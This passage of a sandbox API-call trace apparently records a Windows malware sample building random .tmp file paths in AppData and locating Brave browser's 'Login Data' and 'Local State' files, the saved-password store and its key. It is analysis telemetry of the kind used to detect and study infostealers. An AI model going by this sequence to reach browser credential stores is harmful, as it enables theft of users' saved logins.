dwSize=0x76, flAllocationType=0x3000, flProtect=0x4) returned 0x2de0000 [0203.391] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.391] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\tbvcwor", lpString2=".tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\tbvcwor.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\tbvcwor.tmp" [0203.391] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.391] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x415f810, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 1 [0203.391] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.391] VirtualAlloc (lpAddress=0x0, dwSize=0x5c, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.392] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.392] lstrcpyW (in: lpString1=0x2d80000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" [0203.392] lstrlenW (lpString="\\") returned 1 [0203.392] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.392] lstrlenW (lpString="\\") returned 1 [0203.392] lstrcpyW (in: lpString1=0x2dd0000, lpString2="\\" | out: lpString1="\\") returned="\\" [0203.392] lstrlenW (lpString="\\") returned 1 [0203.392] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.392] VirtualQuery (in: lpAddress=0x2d80000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2d80000, AllocationBase=0x2d80000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.392] VirtualAlloc (lpAddress=0x0, dwSize=0x60, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0203.392] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.393] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0203.393] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.393] GetProcessHeap () returned 0x900000 [0203.393] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x8) returned 0x934878 [0203.393] lstrlenA (lpString="tuoBdic") returned 7 [0203.393] lstrlenA (lpString="tuoBdic") returned 7 [0203.393] VirtualAlloc (lpAddress=0x0, dwSize=0x7, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.393] lstrcpyA (in: lpString1=0x2d80000, lpString2="tuoBdic" | out: lpString1="tuoBdic") returned="tuoBdic" [0203.393] lstrlenA (lpString="tuoBdic") returned 7 [0203.393] lstrlenA (lpString="tuoBdic") returned 7 [0203.393] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x2, lpMultiByteStr=0x2d80000, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0203.393] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.394] lstrlenA (lpString="tuoBdic") returned 7 [0203.394] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2d80000, cbMultiByte=-1, lpWideCharStr=0x2dd0000, cchWideChar=18 | out: lpWideCharStr="tuoBdic") returned 8 [0203.394] lstrlenW (lpString="tuoBdic") returned 7 [0203.394] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0203.394] lstrlenW (lpString="tuoBdic") returned 7 [0203.394] lstrcpyW (in: lpString1=0x2e20000, lpString2="tuoBdic" | out: lpString1="tuoBdic") returned="tuoBdic" [0203.394] lstrlenW (lpString="tuoBdic") returned 7 [0203.394] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2eb0000 [0203.394] lstrcpyW (in: lpString1=0x2eb0000, lpString2="tuoBdic" | out: lpString1="tuoBdic") returned="tuoBdic" [0203.395] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.395] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.395] lstrlenW (lpString="tuoBdic") returned 7 [0203.395] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.395] lstrcatW (in: lpString1="", lpString2="tuoBdic" | out: lpString1="tuoBdic") returned="tuoBdic" [0203.395] VirtualFree (lpAddress=0x2eb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.396] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.396] GetProcessHeap () returned 0x900000 [0203.396] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x934878 | out: hHeap=0x900000) returned 1 [0203.396] lstrlenW (lpString="tuoBdic") returned 7 [0203.396] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0203.396] VirtualQuery (in: lpAddress=0x2df0000, lpBuffer=0x415f9cc, dwLength=0x1c | out: lpBuffer=0x415f9cc*(BaseAddress=0x2df0000, AllocationBase=0x2df0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.396] VirtualAlloc (lpAddress=0x0, dwSize=0x6e, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.396] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.396] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="tuoBdic" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\tuoBdic") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\tuoBdic" [0203.397] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.397] lstrlenW (lpString=".tmp") returned 4 [0203.397] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.397] lstrlenW (lpString=".tmp") returned 4 [0203.397] lstrcpyW (in: lpString1=0x2dd0000, lpString2=".tmp" | out: lpString1=".tmp") returned=".tmp" [0203.397] lstrlenW (lpString=".tmp") returned 4 [0203.397] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\tuoBdic") returned 53 [0203.397] VirtualQuery (in: lpAddress=0x2d80000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2d80000, AllocationBase=0x2d80000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.397] VirtualAlloc (lpAddress=0x0, dwSize=0x76, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0203.397] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.398] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\tuoBdic", lpString2=".tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\tuoBdic.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\tuoBdic.tmp" [0203.398] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.398] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x415f810, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 1 [0203.398] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.398] VirtualAlloc (lpAddress=0x0, dwSize=0x58, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.398] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.398] lstrcpyW (in: lpString1=0x2d80000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" [0203.398] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.398] VirtualAlloc (lpAddress=0x0, dwSize=0x58, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.399] lstrcpyW (in: lpString1=0x2dd0000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" [0203.399] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.399] lstrlenW (lpString="\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Login Data") returned 57 [0203.399] VirtualAlloc (lpAddress=0x0, dwSize=0x74, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.399] lstrlenW (lpString="\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Login Data") returned 57 [0203.399] lstrcpyW (in: lpString1=0x2d80000, lpString2="\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Login Data" | out: lpString1="\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Login Data") returned="\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Login Data" [0203.399] lstrlenW (lpString="\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Login Data") returned 57 [0203.399] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.399] VirtualQuery (in: lpAddress=0x2dd0000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2dd0000, AllocationBase=0x2dd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.399] VirtualAlloc (lpAddress=0x0, dwSize=0xcc, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0203.399] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.400] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpString2="\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Login Data" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Login Data") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Login Data" [0203.400] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.400] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x415f810, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 1 [0203.400] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.400] VirtualAlloc (lpAddress=0x0, dwSize=0x58, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.400] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.400] lstrcpyW (in: lpString1=0x2d80000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" [0203.400] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.400] VirtualAlloc (lpAddress=0x0, dwSize=0x58, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.401] lstrcpyW (in: lpString1=0x2dd0000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" [0203.401] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.401] lstrlenW (lpString="\\BraveSoftware\\Brave-Browser\\User Data\\Local State") returned 50 [0203.401] VirtualAlloc (lpAddress=0x0, dwSize=0x66, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.401] lstrlenW (lpString="\\BraveSoftware\\Brave-Browser\\User Data\\Local State") returned 50 [0203.401] lstrcpyW (in: lpString1=0x2d80000, lpString2="\\BraveSoftware\\Brave-Browser\\User Data\\Local State" | out: lpString1="\\BraveSoftware\\Brave-Browser\\User Data\\Local State") returned="\\BraveSoftware\\Brave-Browser\\User Data\\Local State" [0203.401] lstrlenW (lpString="\\BraveSoftware\\Brave-Browser\\User Data\\Local State") returned 50 [0203.401] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.401] VirtualQuery (in: lpAddress=0x2dd0000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2dd0000, AllocationBase=0x2dd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.401] VirtualAlloc (lpAddress=0x0, dwSize=0xbe, flAllocationType=0x3000, flProtect=0x4) returned 0x2eb0000 [0203.402] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.402] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpString2="\\BraveSoftware\\Brave-Browser\\User Data\\Local State" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data\\Local State") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data\\Local State" [0203.402] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.402] PathFileExistsW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Login Data") returned 0 [0203.402] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.403] VirtualFree (lpAddress=0x2de0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.403] VirtualFree (lpAddress=0x2eb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.403] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.403] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x415f810, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 1 [0203.403] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.403] VirtualAlloc (lpAddress=0x0, dwSize=0x5c, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.404] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.404] lstrcpyW (in: lpString1=0x2d80000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" [0203.404] lstrlenW (lpString="\\") returned 1 [0203.404] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.404] lstrlenW (lpString="\\") returned 1 [0203.404] lstrcpyW (in: lpString1=0x2dd0000, lpString2="\\" | out: lpString1="\\") returned="\\" [0203.404] lstrlenW (lpString="\\") returned 1 [0203.404] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.404] VirtualQuery (in: lpAddress=0x2d80000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2d80000, AllocationBase=0x2d80000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.404] VirtualAlloc (lpAddress=0x0, dwSize=0x60, flAllocationType=0x3000, flProtect=0x4) returned 0x2de0000 [0203.405] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.405] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0203.405] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.405] GetProcessHeap () returned 0x900000 [0203.405] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x8) returned 0x934878 [0203.405] lstrlenA (lpString="A.rjrAu") returned 7 [0203.405] lstrlenA (lpString="A.rjrAu") returned 7 [0203.405] VirtualAlloc (lpAddress=0x0, dwSize=0x7, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.405] lstrcpyA (in: lpString1=0x2d80000, lpString2="A.rjrAu" | out: lpString1="A.rjrAu") returned="A.rjrAu" [0203.405] lstrlenA (lpString="A.rjrAu") returned 7 [0203.405] lstrlenA (lpString="A.rjrAu") returned 7 [0203.406] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x2, lpMultiByteStr=0x2d80000, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0203.406] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.406] lstrlenA (lpString="A.rjrAu") returned 7 [0203.406] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2d80000, cbMultiByte=-1, lpWideCharStr=0x2dd0000, cchWideChar=18 | out: lpWideCharStr="A.rjrAu") returned 8 [0203.406] lstrlenW (lpString="A.rjrAu") returned 7 [0203.406] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0203.406] lstrlenW (lpString="A.rjrAu") returned 7 [0203.406] lstrcpyW (in: lpString1=0x2df0000, lpString2="A.rjrAu" | out: lpString1="A.rjrAu") returned="A.rjrAu" [0203.406] lstrlenW (lpString="A.rjrAu") returned 7 [0203.406] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0203.406] lstrcpyW (in: lpString1=0x2e20000, lpString2="A.rjrAu" | out: lpString1="A.rjrAu") returned="A.rjrAu" [0203.407] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.407] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.407] lstrlenW (lpString="A.rjrAu") returned 7 [0203.407] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.407] lstrcatW (in: lpString1="", lpString2="A.rjrAu" | out: lpString1="A.rjrAu") returned="A.rjrAu" [0203.407] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.407] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.408] GetProcessHeap () returned 0x900000 [0203.408] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x934878 | out: hHeap=0x900000) returned 1 [0203.408] lstrlenW (lpString="A.rjrAu") returned 7 [0203.408] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0203.408] VirtualQuery (in: lpAddress=0x2de0000, lpBuffer=0x415f9cc, dwLength=0x1c | out: lpBuffer=0x415f9cc*(BaseAddress=0x2de0000, AllocationBase=0x2de0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.408] VirtualAlloc (lpAddress=0x0, dwSize=0x6e, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.408] VirtualFree (lpAddress=0x2de0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.409] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="A.rjrAu" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\A.rjrAu") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\A.rjrAu" [0203.409] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.409] lstrlenW (lpString=".tmp") returned 4 [0203.409] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.409] lstrlenW (lpString=".tmp") returned 4 [0203.409] lstrcpyW (in: lpString1=0x2dd0000, lpString2=".tmp" | out: lpString1=".tmp") returned=".tmp" [0203.409] lstrlenW (lpString=".tmp") returned 4 [0203.409] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\A.rjrAu") returned 53 [0203.409] VirtualQuery (in: lpAddress=0x2d80000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2d80000, AllocationBase=0x2d80000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.409] VirtualAlloc (lpAddress=0x0, dwSize=0x76, flAllocationType=0x3000, flProtect=0x4) returned 0x2de0000 [0203.410] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.410] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\A.rjrAu", lpString2=".tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\A.rjrAu.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\A.rjrAu.tmp" [0203.410] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.410] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x415f810, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 1 [0203.410] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.410] VirtualAlloc (lpAddress=0x0, dwSize=0x5c, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.411] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.411] lstrcpyW (in: lpString1=0x2d80000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" [0203.411] lstrlenW (lpString="\\") returned 1 [0203.411] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.411] lstrlenW (lpString="\\") returned 1 [0203.411] lstrcpyW (in: lpString1=0x2dd0000, lpString2="\\" | out: lpString1="\\") returned="\\" [0203.411] lstrlenW (lpString="\\") returned 1 [0203.411] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.411] VirtualQuery (in: lpAddress=0x2d80000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2d80000, AllocationBase=0x2d80000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.411] VirtualAlloc (lpAddress=0x0, dwSize=0x60, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0203.411] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.411] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0203.412] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.412] GetProcessHeap () returned 0x900000 [0203.412] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x8) returned 0x934878 [0203.412] lstrlenA (lpString="dtDaJax") returned 7 [0203.412] lstrlenA (lpString="dtDaJax") returned 7 [0203.412] VirtualAlloc (lpAddress=0x0, dwSize=0x7, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.412] lstrcpyA (in: lpString1=0x2d80000, lpString2="dtDaJax" | out: lpString1="dtDaJax") returned="dtDaJax" [0203.412] lstrlenA (lpString="dtDaJax") returned 7 [0203.412] lstrlenA (lpString="dtDaJax") returned 7 [0203.412] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x2, lpMultiByteStr=0x2d80000, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0203.412] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.412] lstrlenA (lpString="dtDaJax") returned 7 [0203.412] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2d80000, cbMultiByte=-1, lpWideCharStr=0x2dd0000, cchWideChar=18 | out: lpWideCharStr="dtDaJax") returned 8 [0203.413] lstrlenW (lpString="dtDaJax") returned 7 [0203.413] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0203.413] lstrlenW (lpString="dtDaJax") returned 7 [0203.413] lstrcpyW (in: lpString1=0x2e20000, lpString2="dtDaJax" | out: lpString1="dtDaJax") returned="dtDaJax" [0203.413] lstrlenW (lpString="dtDaJax") returned 7 [0203.413] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2eb0000 [0203.413] lstrcpyW (in: lpString1=0x2eb0000, lpString2="dtDaJax" | out: lpString1="dtDaJax") returned="dtDaJax" [0203.413] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.413] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.414] lstrlenW (lpString="dtDaJax") returned 7 [0203.414] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.414] lstrcatW (in: lpString1="", lpString2="dtDaJax" | out: lpString1="dtDaJax") returned="dtDaJax" [0203.414] VirtualFree (lpAddress=0x2eb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.414] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.414] GetProcessHeap () returned 0x900000 [0203.414] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x934878 | out: hHeap=0x900000) returned 1 [0203.414] lstrlenW (lpString="dtDaJax") returned 7 [0203.414] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0203.414] VirtualQuery (in: lpAddress=0x2df0000, lpBuffer=0x415f9cc, dwLength=0x1c | out: lpBuffer=0x415f9cc*(BaseAddress=0x2df0000, AllocationBase=0x2df0000, 